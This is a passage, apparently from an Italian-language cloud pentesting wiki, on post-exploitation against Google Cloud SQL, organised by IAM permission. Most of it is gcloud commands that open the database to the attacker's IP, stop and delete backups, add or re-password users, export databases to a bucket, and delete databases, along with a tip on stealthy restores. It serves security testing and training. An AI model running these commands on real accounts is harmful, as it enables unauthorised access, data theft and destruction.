GCP - Cloud SQL Post Exploitation

Cloud SQL

Per ulteriori informazioni su Cloud SQL, controlla:

cloudsql.instances.update, ( cloudsql.instances.get)

Per connettersi ai database, è sufficiente avere accesso alla porta del database e conoscere il nome utente e la password, non ci sono requisiti IAM. Quindi, un modo semplice per ottenere accesso, supponendo che il database abbia un indirizzo IP pubblico, è aggiornare le reti consentite e permettere al proprio indirizzo IP di accedervi.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

È anche possibile utilizzare --no-backup per interrompere i backup del database.

Poiché questi sono i requisiti, non sono completamente sicuro a cosa servano i permessi cloudsql.instances.connect e cloudsql.instances.login. Se lo sai, invia una PR!

cloudsql.users.list

Ottieni un elenco di tutti gli utenti del database:

gcloud sql users list --instance <intance-name>

cloudsql.users.create

Questo permesso consente di creare un nuovo utente all'interno del database:

gcloud sql users create <username> --instance <instance-name> --password <password>

cloudsql.users.update

Questo permesso consente di aggiornare l'utente all'interno del database. Ad esempio, puoi cambiare la sua password:

gcloud sql users set-password <username> --instance <instance-name> --password <password>

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

I backup potrebbero contenere vecchie informazioni sensibili, quindi è interessante controllarli. Ripristina un backup all'interno di un database:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

Per farlo in modo più furtivo, è consigliato creare una nuova istanza SQL e recuperare i dati lì invece che nei database attualmente in esecuzione.

cloudsql.backupRuns.delete

Questo permesso consente di eliminare i backup:

gcloud sql backups delete <backup-id> --instance <instance-id>

cloudsql.instances.export, storage.objects.create

Esporta un database in un Cloud Storage Bucket in modo da poterlo accedere da lì:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>

cloudsql.instances.import, storage.objects.get

Importa un database (sovrascrivi) da un Cloud Storage Bucket:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

cloudsql.databases.delete

Elimina un database dall'istanza db:

gcloud sql databases delete <db-name> --instance <instance-id>